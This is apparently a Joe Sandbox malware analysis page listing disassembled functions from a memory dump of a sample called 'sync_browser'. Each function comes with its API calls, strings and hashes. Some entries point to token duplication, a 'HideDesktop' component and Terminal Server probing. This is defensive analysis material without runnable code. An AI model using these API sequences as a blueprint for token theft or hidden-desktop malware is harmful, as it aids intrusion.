Opcode Fuzzy Hash: fedb473ed8e07211a0b48662a4d4207601b42be0040328777e4ad7852e106941
Instruction Fuzzy Hash: B6312B51E1C647C1EE58B7A5585077D92A2AF427A0FD05631DD2D473FADF2CF841C220

Function 00007FF740097C90 Relevance: 9.1, APIs: 6, Instructions: 64synchronizationCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF740097CA9
LeaveCriticalSection.KERNEL32 ref: 00007FF740097CC3

Part of subcall function 00007FF7400C2950: RaiseException.KERNEL32 ref: 00007FF7400C29CB

LeaveCriticalSection.KERNEL32 ref: 00007FF740097CE7
TlsGetValue.KERNEL32 ref: 00007FF740097CF3
WaitForSingleObject.KERNEL32 ref: 00007FF740097D3B
GetLastError.KERNEL32 ref: 00007FF740097D45

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$EnterErrorExceptionLastObjectRaiseSingleValueWait
String ID:
API String ID: 824239979-0
Opcode ID: 12bf6ecd7088038fd47cecf56f3922a6986b1dec9d24cf819874f6182f192e8f
Instruction ID: 0161ae20d1ef7b6d529cb075eb37cef683d32919b00ab59ae5da1c090fc9c1af
Opcode Fuzzy Hash: 12bf6ecd7088038fd47cecf56f3922a6986b1dec9d24cf819874f6182f192e8f
Instruction Fuzzy Hash: 7C216F32A2DA42C2EB45BF20E444569A3A0FF84784F845131EA5E02B69DF3CF845C760

Function 00007FF740011C10 Relevance: 9.1, APIs: 6, Instructions: 62COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 00007FF740011C72
OpenProcessToken.ADVAPI32 ref: 00007FF740011C92
DuplicateTokenEx.ADVAPI32 ref: 00007FF740011CB8
SetTokenInformation.ADVAPI32 ref: 00007FF740011CD2
CloseHandle.KERNEL32 ref: 00007FF740011CDD
CloseHandle.KERNEL32 ref: 00007FF740011CE6

Part of subcall function 00007FF7400119A0: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF7400119C6
Part of subcall function 00007FF7400119A0: Process32First.KERNEL32 ref: 00007FF7400119E5
Part of subcall function 00007FF7400119A0: CloseHandle.KERNEL32 ref: 00007FF7400119F2

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: CloseHandleToken$OpenProcess$CreateDuplicateFirstInformationProcess32SnapshotToolhelp32
String ID:
API String ID: 3355884492-0
Opcode ID: 6104325d5a1b9d43be635a96be43e70745f11669b1d82cc91958b0e9663c2412
Instruction ID: 7cf846b8161ea090a15a249553c8b9dab55c40e1eda53baecfb8311347fedb52
Opcode Fuzzy Hash: 6104325d5a1b9d43be635a96be43e70745f11669b1d82cc91958b0e9663c2412
Instruction Fuzzy Hash: AD218D25B0C682C2E710BB25B444269E760BFC87D0F844034DA6D47BAADF7DE445CB61

Function 00007FF7400B99D8 Relevance: 9.0, APIs: 6, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FF7400B99ED
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7400B99F8
_flush.LIBCMT ref: 00007FF7400B9A07
_freebuf.LIBCMT ref: 00007FF7400B9A11
_fileno.LIBCMT ref: 00007FF7400B9A19

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: _errno_fileno_flush_freebuf_invalid_parameter_noinfo
String ID:
API String ID: 3613856401-0
Opcode ID: 22e8c468e637d92c8e7f14c6622d0db4cac7223b0f4977f25baec7dc4bd546e1
Instruction ID: 3ee75f7b4ac066e885a4c00b9449c5dbe494d32b4bdec3366e36673abd4086f0
Opcode Fuzzy Hash: 22e8c468e637d92c8e7f14c6622d0db4cac7223b0f4977f25baec7dc4bd546e1
Instruction Fuzzy Hash: CD014F12E1C542C1FA587AF5984237995609F95764FA94230EA29463FBCEBCF84183A1

Function 00007FF740010310 Relevance: 9.0, APIs: 6, Instructions: 30COMMON

Download Yara Rule

APIs

DeleteObject.GDI32 ref: 00007FF74001032D
free.LIBCMT ref: 00007FF740010337

Part of subcall function 00007FF7400B8BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF7400B748C), ref: 00007FF7400B8C0A
Part of subcall function 00007FF7400B8BF4: _errno.LIBCMT ref: 00007FF7400B8C14
Part of subcall function 00007FF7400B8BF4: GetLastError.KERNEL32(?,?,?,00007FF7400B748C), ref: 00007FF7400B8C1C

DeleteObject.GDI32 ref: 00007FF740010340
free.LIBCMT ref: 00007FF74001034A
DeleteObject.GDI32 ref: 00007FF740010353
free.LIBCMT ref: 00007FF74001035D

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: DeleteObjectfree$ErrorFreeHeapLast_errno
String ID:
API String ID: 2426525106-0
Opcode ID: 9faadf5584e3ab048ad9f99b225c95f2b16b16b17d63f249fe3ec8bb2152293a
Instruction ID: f5ea0d2d64a52202325b26dcbd4ae63310cdde25191d667a4e570d58d1f76e1a
Opcode Fuzzy Hash: 9faadf5584e3ab048ad9f99b225c95f2b16b16b17d63f249fe3ec8bb2152293a
Instruction Fuzzy Hash: 0D01C26271CA41D6DA54FB66E991578B334FF88B80B844031DB5D43B75CF29F4A5C320

Function 00007FF740010390 Relevance: 9.0, APIs: 6, Instructions: 22COMMON

Download Yara Rule

APIs

DeleteObject.GDI32 ref: 00007FF7400103A7
free.LIBCMT ref: 00007FF7400103B1

Part of subcall function 00007FF7400B8BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF7400B748C), ref: 00007FF7400B8C0A
Part of subcall function 00007FF7400B8BF4: _errno.LIBCMT ref: 00007FF7400B8C14
Part of subcall function 00007FF7400B8BF4: GetLastError.KERNEL32(?,?,?,00007FF7400B748C), ref: 00007FF7400B8C1C

DeleteObject.GDI32 ref: 00007FF7400103BA
free.LIBCMT ref: 00007FF7400103C4
DeleteObject.GDI32 ref: 00007FF7400103CD
free.LIBCMT ref: 00007FF7400103D7

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: DeleteObjectfree$ErrorFreeHeapLast_errno
String ID:
API String ID: 2426525106-0
Opcode ID: 519421b3b674e42368a913bd218afa9024c234a5df41dca482dc94a54fba9521
Instruction ID: 260fb4002de56f00b92acd910662e2b1d5c2af2a3b6d70406f46f46685de81ed
Opcode Fuzzy Hash: 519421b3b674e42368a913bd218afa9024c234a5df41dca482dc94a54fba9521
Instruction Fuzzy Hash: 3FF0B2A2A18A41C1EB54FF75E891478A338FF88F84B804031CE1D82379CF28E896C360

Function 00007FF74001DD20 Relevance: 9.0, APIs: 6, Instructions: 22COMMON

Download Yara Rule

APIs

DeleteObject.GDI32 ref: 00007FF74001DD37
free.LIBCMT ref: 00007FF74001DD41

Part of subcall function 00007FF7400B8BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF7400B748C), ref: 00007FF7400B8C0A
Part of subcall function 00007FF7400B8BF4: _errno.LIBCMT ref: 00007FF7400B8C14
Part of subcall function 00007FF7400B8BF4: GetLastError.KERNEL32(?,?,?,00007FF7400B748C), ref: 00007FF7400B8C1C

DeleteObject.GDI32 ref: 00007FF74001DD4A
free.LIBCMT ref: 00007FF74001DD54
DeleteObject.GDI32 ref: 00007FF74001DD5D
free.LIBCMT ref: 00007FF74001DD67

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: DeleteObjectfree$ErrorFreeHeapLast_errno
String ID:
API String ID: 2426525106-0
Opcode ID: ed0781dc8889168bce117aea87ed44a54f9bb397e4d36f2ca679cd736364b467
Instruction ID: 260fb4002de56f00b92acd910662e2b1d5c2af2a3b6d70406f46f46685de81ed
Opcode Fuzzy Hash: ed0781dc8889168bce117aea87ed44a54f9bb397e4d36f2ca679cd736364b467
Instruction Fuzzy Hash: 3FF0B2A2A18A41C1EB54FF75E891478A338FF88F84B804031CE1D82379CF28E896C360

Function 00007FF740057530 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 78libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF740057574
GetProcAddress.KERNEL32 ref: 00007FF740057591
FreeLibrary.KERNEL32 ref: 00007FF740057619

Strings

EnumDisplayDevicesA, xrefs: 00007FF740057587
USER32, xrefs: 00007FF74005756D

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID: EnumDisplayDevicesA$USER32
API String ID: 145871493-2970514552
Opcode ID: ce794e2cbdb766f9e1c0efda30611b8e823122e68f144a872fe4c48864dd2d5a
Instruction ID: 28c4ccf95f6fc83a0b257f6def13b1ec04848df69a660f8e8181915fd2684e74
Opcode Fuzzy Hash: ce794e2cbdb766f9e1c0efda30611b8e823122e68f144a872fe4c48864dd2d5a
Instruction Fuzzy Hash: 5431B33260CF82C5EA60FB15B444AA9A2A4FF85794F950135DE9D037A8EF3CF801C720

Function 00007FF7400572F0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF740057335
GetProcAddress.KERNEL32 ref: 00007FF740057352
FreeLibrary.KERNEL32 ref: 00007FF7400573D9

Strings

EnumDisplayDevicesA, xrefs: 00007FF740057348
USER32, xrefs: 00007FF74005732E

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID: EnumDisplayDevicesA$USER32
API String ID: 145871493-2970514552
Opcode ID: c302339970f6293fc38423b47487169b7c7610065756fe4ae123da4c8d70ed68
Instruction ID: c82fc8ff66d2a18cc381b9a05d1ac379528b1be69903725090327f58629e5f43
Opcode Fuzzy Hash: c302339970f6293fc38423b47487169b7c7610065756fe4ae123da4c8d70ed68
Instruction Fuzzy Hash: FF31723260CB86C5E760FB15F4446A9A3A0FB89B94F950235DE9D137A8DF3CE501D720

Function 00007FF740057410 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF740057455
GetProcAddress.KERNEL32 ref: 00007FF740057472
FreeLibrary.KERNEL32 ref: 00007FF7400574F9

Strings

EnumDisplayDevicesA, xrefs: 00007FF740057468
USER32, xrefs: 00007FF74005744E

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID: EnumDisplayDevicesA$USER32
API String ID: 145871493-2970514552
Opcode ID: d63241eccbf7de335e5bf3da54cc8ef173d0710342ef8f715da4294a33c1ad9f
Instruction ID: 54196da7bbb53eb425e3637723bf333f7b069d0d4f74a33dfeb6337685db07b1
Opcode Fuzzy Hash: d63241eccbf7de335e5bf3da54cc8ef173d0710342ef8f715da4294a33c1ad9f
Instruction Fuzzy Hash: 4031843261CB81C5EA60FB15F4446A9A7A4FB89B94F950235DE9D037A9DF3CE501CB20

Function 00007FF740006BA0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FF740006BDE
RegQueryValueExA.ADVAPI32 ref: 00007FF740006C1C
RegCloseKey.ADVAPI32 ref: 00007FF740006C9C

Strings

Software\Microsoft\Windows NT\CurrentVersion, xrefs: 00007FF740006BC0
CSDVersion, xrefs: 00007FF740006C05

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: CSDVersion$Software\Microsoft\Windows NT\CurrentVersion
API String ID: 3677997916-605553437
Opcode ID: e687beb703156b10d4b9a4dc2033f7a7f464ba5dff228a3a31641666442cd2e3
Instruction ID: 5fdc35f026ddc8454affc6b16f3579a06accae2ecd0c2714a5369f614fb9d0fc
Opcode Fuzzy Hash: e687beb703156b10d4b9a4dc2033f7a7f464ba5dff228a3a31641666442cd2e3
Instruction Fuzzy Hash: 65314F61A1D682C1FB60BB20F45077AA7A0FB85754F801232F6DE56BA8DF2DF444CB20

Function 00007FF7400571D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 68libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF740057212
GetProcAddress.KERNEL32 ref: 00007FF74005722F
FreeLibrary.KERNEL32 ref: 00007FF74005729D

Strings

EnumDisplayDevicesA, xrefs: 00007FF740057225
USER32, xrefs: 00007FF74005720B

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID: EnumDisplayDevicesA$USER32
API String ID: 145871493-2970514552
Opcode ID: 20b902f79b4c6cb6d22b363d0868b8f0204c862da4352ce45faa7478bd25a1e0
Instruction ID: 58b5b076e62f7194374dcf413b1543b3bb8bc0a72bdd3dbafaa93ad0405db367
Opcode Fuzzy Hash: 20b902f79b4c6cb6d22b363d0868b8f0204c862da4352ce45faa7478bd25a1e0
Instruction Fuzzy Hash: B8218132B1CB41C2E760FF11B4446A9A3A0FB88794F850135DAAD537A8DF3CE4018750

Function 00007FF74000A600 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 36libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF74000A661

Part of subcall function 00007FF74000A200: GetProcAddress.KERNEL32 ref: 00007FF74000A225
Part of subcall function 00007FF74000A200: FreeLibrary.KERNEL32 ref: 00007FF74000A265

Part of subcall function 00007FF74000A290: CoInitialize.OLE32 ref: 00007FF74000A2B8
Part of subcall function 00007FF74000A290: CoCreateInstance.OLE32 ref: 00007FF74000A2E5

SystemParametersInfoA.USER32 ref: 00007FF74000A694

Strings

HideDesktop.cpp : Restorewallpaper %i %i, xrefs: 00007FF74000A635
shell32.dll, xrefs: 00007FF74000A65A
HideDesktop.cpp : Restorewallpaper %i, xrefs: 00007FF74000A60B

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Library$AddressCreateFreeInfoInitializeInstanceLoadParametersProcSystem
String ID: HideDesktop.cpp : Restorewallpaper %i$HideDesktop.cpp : Restorewallpaper %i %i$shell32.dll
API String ID: 3848869850-2975526927
Opcode ID: 86e18f80a34eacc762fd4aea0dba914ccb49a3b135e5f10d2f504f448b0c5f0f
Instruction ID: 095091521cfa2937c6c69fba42205d39fe07ce3e63ea93fa4baea3e29d71752a
Opcode Fuzzy Hash: 86e18f80a34eacc762fd4aea0dba914ccb49a3b135e5f10d2f504f448b0c5f0f
Instruction Fuzzy Hash: 42111574E0D603C1FA54BB20B8146B9A3A1BF95348FC44036C44D563B9DE3CB60ACB72

Function 00007FF740006CC0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FF740006CF3
RegQueryValueExA.ADVAPI32 ref: 00007FF740006D35
RegCloseKey.ADVAPI32 ref: 00007FF740006D54

Strings

System\CurrentControlSet\Control\Terminal Server, xrefs: 00007FF740006CCE
TSAppCompat, xrefs: 00007FF740006D16

